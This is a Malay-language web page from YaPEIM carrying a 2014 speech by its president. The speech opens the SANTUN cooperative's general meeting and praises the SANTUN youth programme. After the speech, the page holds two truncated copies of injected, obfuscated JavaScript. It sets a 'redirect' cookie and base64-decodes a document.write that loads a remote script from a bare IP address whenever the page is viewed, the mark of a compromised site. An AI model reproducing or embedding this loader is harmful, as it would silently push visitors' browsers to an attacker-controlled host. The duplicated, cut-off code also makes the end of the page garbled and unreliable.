YaPEIM » Majlis Perasmian Mesyuarat Agung Koperasi SANTUN & Pengisytiharan JK Kelab SANTUN Nasional

Terkini

Majlis Perasmian Mesyuarat Agung Koperasi SANTUN & Pengisytiharan JK Kelab SANTUN Nasional

Majlis Perasmian Mesyuarat Agung & Pengisytiharan Jawatankuasa SANTUN yang dirasmikan oleh Dato’ Presiden YaPEIM di Berjaya Times Square Hotel.

BISMILLAHHIRAHMANIRRAHIM

– Y.BHG. DATO’ ABIBULLAH HJ. SAMSUDIN (KETUA PENGARAH YaPEIM)

– AHLI-AHLI LEMBAGA PEMEGANG AMANAH YaPEIM DAN PEMANGKIN

– WAKIL JABATAN PEMBANGUNAN KOPERASI

– PEMIMPIN  KELAB SANTUN NASIONAL,

– PEMIMPIN KELAB ALUMNI SANTUN DAN WARGA SANTUN

– TERMASUK ANAKANDA SAYA DARIPADA SANTUN 1 MALAYSIA

– PENGERUSI DAN AHLI LEMBAGA PENGARAH

– KOPERASI SANTUN DAN AHLI YANG DIRAIKAN

– AHLI-AHLI MEDIA MASSA

SDRA/I SEKALIAN

ASSALAMUALAIKUM WR WBH. DAN SALAM SEJAHTERA.

PENGHARGAAN

1. Alhamdulillah, kesyukuran yang setinggi-tingginya saya ucapkan ke hadrat Allah SWT di atas limpah izin dan kurnia-Nya, saya dapat bersama-sama keluarga besar YaPEIM, dan kali ini adalah bagi menyempurnakan Majlis Perasmian Mesyuarat Agung  Koperasi SANTUN Berhad DAN Majlis Pengishtiharan pimpinan Kelab SANTUN Nasional, sempena Perkhemahan SANTUN Nasional 2014  pada hari yang berbahagia ini.

2. Saya ingin mengambil peluang ini untuk mengucapkan berbanyak terima kasih yang tidak terhingga kepada Pengurusan YaPEIM, Pengurusan PEMANGKIN, Kelab SANTUN, Kelab Alumni SANTUN dan Kepimpinan Koperasi SANTUN YaPEIM Berhad,  di atas kesudian menjemput saya bagi menyempurnakan Majlis Perasmian dan Acara Perisytiharan Kepimpinan kepimpinan Kelan Nasional SANTUN pada hari yang bersejarah ini. Secara peribadi saya anggap kesempatan seperti ini amat bermakna dan besar ertinya kepada saya selaku Presiden dan Pengerusi LPA  YaPEIM yang baru.

3. Saya juga ingin menyatakan rasa bangga di atas komitmen dan kesungguhan anakanda semua untuk menjayakan Program Perkhemahan Nasional 2014 dan komitmen untuk menggerakkan Koperasi SANTUN YaPEIM, samada atas kapisiti pemimpin, urusetia mahupun peserta dan anggota kepada Kelab SANTUN dan Koperasi SANTUN.

4. Komitmen dan kesungguhan seperti ini Ayahanda lihat sangat penting, bukan sahaja kerana polisi baru yang diperkenalkan, akan dilakukan proses pemutihan sekiranya terdapat warga yang tidak menunjukkan minat untuk terus bersama di bawah SANTUN; lebih daripada itu dan apa yang lebih penting ialah Ayahanda melihat jika SANTUN ingin berjaya dalam apa jua aspek, komitmen dan kesungguhan itu harus lah datang daripada warga SANTUN sendiri. Apa yang dilakukan oleh YaPEIM dan PEMANGKIN – semata-mata ingin melihat anakanda semua berjaya dalam aspek yang gariskan dan Model SANTUN ini boleh diangkat sebagai model terunggul dalam melestarikan kecemerlangan. Tahniah di atas komitmen dan kesungguhan yang di pamirkan.

KEMAJUAN YANG MENCETUS INSPIRASI

5. Alhamdulilah sejak SANTUN diperkenalkan pada tahun 2006 yang lalu, seperti yang disenaraikan oleh YB Menteri kita sewaktu merasmikan Perkhemahan Nasional SANTUN 2014 semalam, sangat banyak kemajuan yang kita capai. Kewujudan dan kemajuan SANTUN memberi kesan yanag tersendiri kepada usaha kita untuk menjayakan konsep Islah seperti yang diisyaratkan melalui  Surah Al-Baqarah ayat 220 Allah (bermaksud):  

“Memperbaiki keadaan anak-anak yatim itu amatlah baiknya.”

6. Dalam perjalanan kita ini,

– Sesungguh yang kita cari adalah kejayaan atau kemenangan (Dunia dan Akhirat).

– Setiap kejayaan itu kita mahu ianya terus bertahan lama.

– Kejayaan itu juga membuatkan kita dapat menunaikan peranan kita dalam menunaikan tanggungjawab (Dunia dan Akhirat).

– Peranan yang kita mainkan haruslah pula sesuatu yang diperlukan oleh Agama, Negara dan Ummah (relavan)

7. Untuk Berjaya kita harus memenuhi syarat-syarat sebagai orang yang Berjaya. Dalam Al Quran mengingatkan kita umpamanya dalam Surah Al Baqarah, Ayat : 5 (Muflihun –orang yang Berjaya):

Mereka itulah yang tetap mendapat petunjuk dari Tuhan mereka, dan merekalah orang-orang yang berjaya.

dan Surah Ali Imran, Ayat 104: (Muflihun – orang yang berjaya):

“Dan hendaklah ada di antara kamu satu puak yang menyeru (berdakwah) kepada kebajikan (mengembangkan Islam), dan menyuruh berbuat segala perkara yang baik, serta melarang daripada segala yang salah (buruk dan keji). Dan mereka yang bersifat demikian ialah orang-orang yang berjaya.”

8. Kesemua concern kita untuk berjaya dan menjadi orang yang relavan ini,

– Juga diinginkan oleh semua orang. Perbezaannya ialah apakah semua orang bersedia dan mampu melakukannya.

– Concern inilah juga yang membawa kepada YaPEIM memilih bagi menjayakan tema perancangan kita “Memantap Pendekatan Perniagaan, Memacu Pertumbuhan, Meningkat Kesejahteraan Ummah”.

– Tema ini juga sangat terkait dengan keprihatinan pengkaji –pengkaji pembangunan sosial di dunia pada dekad-dekad terakhir ini yang mengaitkan dengan istilah “Social Enterpreneurship” dan “Sustainability”.

– Terkini menjadi tema ICONPO IV yang dianjurkan oleh UUM dan APSPA, dimana YaPEIM diberi penghormatan merssmikannya pada 25 Ogos 2014 (semalam).

9. Dalam konteks SANTUN, untuk mengejar kejayaan ini, sesungguhnya kita punyai kelebihan untuk merealkisasikannya dan faktor-faktor yang mendorong untuk kita mencipta kejayaan ini, kini berada dihadapan kita.

10. Jumlah warga SANTUN yang kini:

– mencecah 3807 kesemuanya (termasuk 225 yang telah graduate daripada SANTUN) , yang terdiri daripada SANTUN Nasional 3622, SANTUN 1 Malaysia 40, SANTUN Junior 74, SANTUN Adik-Adik Ku 24 dan SANTUN Serantau 8; merupakan satu jumlah yang sangat significant kepada satu wadah pergerakan generasi muda, yang menjanjikan masa depan yang sangat meyakinkan.

– Lebih membanggakan apabila Ayahanda mendapat info, bahawa seramai 6 orang telah mengambil Master Degree dan 2 orang sedang menyiapkan pengajian di peringkat  PhD ( Mathematik & Syariah). Tahniah Anakanda Mohamad Nazri Hussein: PhD Mathematik, UMT dan Khairul Azhar Meerangani: PhD Syariah, UM.

– Bilangan warga SANTUN akan terus bertambah dari tahun ketahun dan akan diperkuatkan lagi apabila SANTUN Luar Negara yang akan diperkenalkan dalam waktu terdekat dan Skim Sukarelawan SANTUN diperkenalkan secara rasmi dan akan menjadi sebahagian daripada warga SANTUN secara rasmi.

11. Sesungguhnya kelebihan yang kita miliki ini bukan sekadar terletak pada angka yang semakin bertambah saban tahun, tetapi lebih daripada itu, terdapat beberapa elemen yang sangat menjanjikan masa depan yang hebat.

12. Masa depan yang hebat ini bukan sahaja akan menjadi milik SANTUN, PEMANGKIN DAN YaPEIM semata-mata, malah kelebihan ini juga bakal menjadi suatu kekuatan luar biasa  yang sangat diperlukan untuk memperhabatkan Syiar  Agama kita, memperkasa Umat dan memakmurkan Negara kita yang tercinta ini seperti yang dinyatakan oleh YB Menteri Di JPM, InsyaAllah.

13. Bagaimanapun semua ini akan menjadi kenyataan dengan syarat kita semua yakin, komited, berusaha keras, bersatu hati dan bersepakat di dalam mengatur langkah untuk menjadikannya sebagai suatu realiti.

14. Diantara kekuatan yang Ayahanda maksudkan,

– Selain daripada Keimanan (terus diantap dan dipertingkatkan) dan menjelamakan keimanan itu dalam kehidupan kita,

– Kekuatan Keilmuan (kepakaran),

– kekuatan kepimpinan,

– kekuatan ekonomi dan

– kekuatan jemaah (kebersamaan).

15. Semua ini dapat kita capai kerana kelebihan-kelebihan berikut yang boleh diterjemahkan sebagai kekuatan :

Pertama: Selain daripada jumlah warga SANTUN akan terus meningkat, lebih daripada itu terdapat 17 bidang kritikal yang pilih oleh anakanda  warga SANTUN sebagai bidang pengajian; yang sangat diperlukan untuk kemajuan umat dan Negara kita kini dan  pada masa depan. Bidang-bidang tersebut termasuklah Perakaunan, Ekonomi, Sains, Kejuruteraan, Pengurusan Perniagaan, Pendidikan, Sains Teknologi, Sains Sosial, Perubatan dan Perubatan sokongan, Teknologi Maklumat, Pengajian Islam, Pertanian, Arkitek, veteriner, Perundangan dan  Maritim;

Kedua: Melalui SANTUN anakanda semua berpeluang membangun diri dalam konteks kepimpinan (Kelab SANTUN – Nasional, Lokaliti dan Luar Negara dan yang terbaru Kelab Alumni SANTUN – Alhamdulillah anakanda semua berpeluang mempamirkan semangat dan cirri kepimpinan di sepanjang Perkhemahan Nasional ini) dengan pelbagai pendekatan dan program dilaksanakan.

Langkah terbaru yang akan kita majukan ialah dengan memberi peluang anakanda untuk mendalami displin Ilmu berasaskan Islam melalui wadah interaksi bersama tokoh-tokoh Ilmuan dibidang yang dikenalpasti; yang akan dijayakan melalui Program Generasi Lestari; yang akan dilancarkan tidak lama lagi (seperti yang Ayahanda nyatakan sewaktu majlis perasmian semalam).

Ketiga: Pada masa yang sama anakanda juga berpeluang merancang dan memperkasa masa depan kewangan bersama melalui semangat keusahawanan (melalui Koperasi SANTUN YaPEIM Berhad – Alhamdulillah Koperasi ini telah disempurnakan pelancarannya semalam oleh YB Menteri kita, YB Mejar Jeneral Dato’ Seri Jamil Khir Hj Baharom); dan

Keempat: Wadah kelab SANTUN dan Kelab Alumni, akan menjadi wadah pemersatu dan menjadi pemangkin semangat kerjasama sesama warga. InsyaAllah wadah seperti ini akan kita terjemahkan menjadi suatu kekuatan dalam kita mengejar kejayaan, mempertahankan kejayaan, menjadikan kejayaan itu memantapkan peranan kita dalam menunaikan tanggungjawab yang diperlukan (relavan).

16. Kelebihan yang bakal kita terjemahkan menjadi kekuatan ini meliputi, 4 elemen yang penting – Ilmu, Kepakaran, Kepimpinan dan Keusahawanan; akan benar-benar menjanjikan kehebatan, jika kita dapat direalisasikan sepenuhnya dan bakal memberi impak yang juga hebat, ika kita benar-benar yakin dengan peringatan Allah SWT dalam Surah Ar Ra’d  Ayat  11 (bermaksud)

“……Sesungguhnya Allah tidak mengubah apa yang ada pada sesuatu kaum sehingga mereka mengubah apa yang ada pada diri mereka sendiri….”

17. Atas semangat untuk melihat SANTUN terus dimantapkan, Ayahanda rasa berbangga apabila melihat proses pemilihan kepimpinan samada Kelab Alumni mahupun Kelab SANTUN Nasional berjalan dengan lancar. Tahniah kerana anakanda semua telah mula menunjukkan kematangan, Alhamdulillah.

18. Alhamdulillah satu langkah perkembangan menarik yang kita saksikan adalah kejayaan kita mewujudkan satu mercu tanda baru dalam road map pergerakkan SANTUN ini iaitu dengan kejayaan kita melancarkan penubuhan Koperasi SANTUN YaPEIM Berhad. Sesungguhnya kelahiran koperasi SANTUN ini sebagai pelengkap kepada pergerakan SANTUN, ianya menjanjikan masa depan yang sangat memberangsangkan.

19. Kelahiran Koperasi baru ini, selain menjadi wahana kepada perancangan mikro SANTUN – Pembangunan Keusahawanan, Kebajikan dan Keuntungan, jauh lebih besar daripada itu adalah kelahiran Koperasi SANTUN ini sekaligus memberi gambaran bahawa warga kita mempunyai kualiti diri dan warga, yang sangat diperlukan dalam memajukan umat dan Negara pada masa depan. InsyaAllah kita mampu buktikan bahawa kopeprasi baru ini mampu untuk berada sebaris dengan koperasi utama di Negara ini dalam waktu yang tidak lama, InsyaAllah.

RUMUSAN DAN PERINGATAN

20. Secara umum Ayahanda ingin menyimpulkan bahawa keupayaan menjayakan samada Kelab mahupun Koperasi yang baru dilahirkan ini, sangat bergantung kepada beberapa faktor berikut:

Pertama:  Komitmen dan Penyertaan warga 

Semua warga termasuk Warga SANTUN, sewajar mengambil peranan yang lebih utama dan pro aktif dalam  memastikan program yang dikemukakan dapat dijayakan sepenuhnya, malah dapat dipertahan dan diteruskan pada masa depan;

Kedua: Mempertahan keikhlasan, profesionalisme dan Amal Jama’iy

Diantara faktor penentu yang utama dalam mempertahan dan meneruskan kejayaan program yang dikemukakan pada masa depan adalah dengan memastikan niat setiap warga haruslah sentiasa tulus dan murni dalam menjayakan sesuatu misi dan visi yang ditentukan. Tahap penguasaan ilmu dan kemahiran seharusnya berada ditahap tertinggi.

Dan juga menjadi elemen yang sangat mendasar ialah semangat Amal Jama’iy hendaklah menjadi pegangan dan pendekatan dalam menjayakan setiap urusan dan mencapai sesuatu matlamat yang telah disepakati;

Ketiga:    Memantap dan menjaga institusi

Institusi induk kepada SANTUN khususnya YaPEIM dan PEMANGKIN, hendaklah terus dimantapkan malah hendaklah sentiasa dijaga dan dilindungi daripada sebarang anasir dan tindakan yang destruktif. Sesungguhnya seperti yang kita tahu bahawa untuk mempertahankan apa yang telah dicapai lebih sukar berbanding langkah dan effort untuk mencipta kejayaan berkenaan; dan

Keempat:  Sentiasa menjaga dan mempertahankan Negara

Sesungguhnya kita harus menginsafi bahawa sesuatu yang kita lakukan dan jayakan selama ini, adalah kerana ada bumi yang kita pijak dan ada langit yang kita junjung. Ertinya kita bukan berada di dalam vakum (ruang kosong).

Atas dasar itulah di dalam apa jua keadaan negara dan umat hendaklah sentiasa dijaga dan dipertahankan, kerana disinilah bumi dipijak dan langit dijunjung. Suasana negara yang aman dan sejahtera lah yang  memungkinkan kejayaan demi kejayaan dapat kita cipta dan nikmati bersama.

Dalam apa jua keadaan sekalipun, warga kita seharusnya sama sekali jangan mengizinkan diri kita dieksploitasi oleh mana-mana pihak yang tidak senang dengan kehebatan pencapaian dan suasana Negara yang aman dan bersatu.

21. Sesungguhnya menyedari kepentingan faktor-faktor seperti saya nyatakan ini merupakan penting, dalam menjayakan rancangan dan program yang kita perkenalkan, termasuklah bagi memantap dan menjayakan misi Kelab SANTUN di dalam dan luar Negara, serta menggerakkan Koperasi SANTUN Berhad dan menjadikan ianya sebagai antara koperasi yang paling berjaya di Negara ini pada masa depan.

22. Ayahanda sangat yakin warga YaPEIM, PEMANGKIN dan SANTUN, mampu membawa semangat yang murni ini dan menjayakan setiap program yang diperkenalkan, InsyaAllah.

PENUTUP

23. Mengakhiri ucapan saya ini, izinkan saya mengucapkan tahniah dan terima kasih atas kejayaan penganjuran majlis yang penting pada hari ini. Dan izinkan saya mengambil peluang ini sekali lagi untuk mengucapkan:

– Tahniah kerana Berjaya  berkampung dalam Perkhemahan Nasional SANTUN 2014;

– Tahniah kerana terus berusaha mementapkan  Kelab-kelab SANTUN di dalam dan Luar Negara, dan hari ini kita  menyaksikan kepimpinanya di isytiharkan;

– Selamat Menjayakan Kelab Alumni SANTUN;

– Selamat merealisasikan menjayakan mercu tanda baru dengan mewujudkan Koperasi SANTUN  YaPEIM  Berhad sebagai koperasi contoh dan rujukan;

– Selamat mengadakan Mesyuarat Agung Koperasi SANTUN Bhd buat kali kedua secara rasmi; dan  akhirnya

– Selamat pulang ke destenasi masing-masing samada di dalam mahupun luar Negara. Selamat dalam perjalanan. Doakan semuga kita dipertemukan Allah SWT dalam suasana kita semua penuh komited melaksanakan tanggungjawab yang Allah amanahkan kepada kita semua.

24. Dengan kata-kata itu, dan dengan lafaz yang mulia Bismillahirrahmanirrahim, saya Merasmikan Mesyuarat Koperasi SANTUN Berhad. Dengan harapan dan doa semoga Allah SWT meRahmati dan memberi Restunya terhadap usaha murni kita bersama, InsyaAllah.  Wassalamu’alaikum Wr Wbth.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top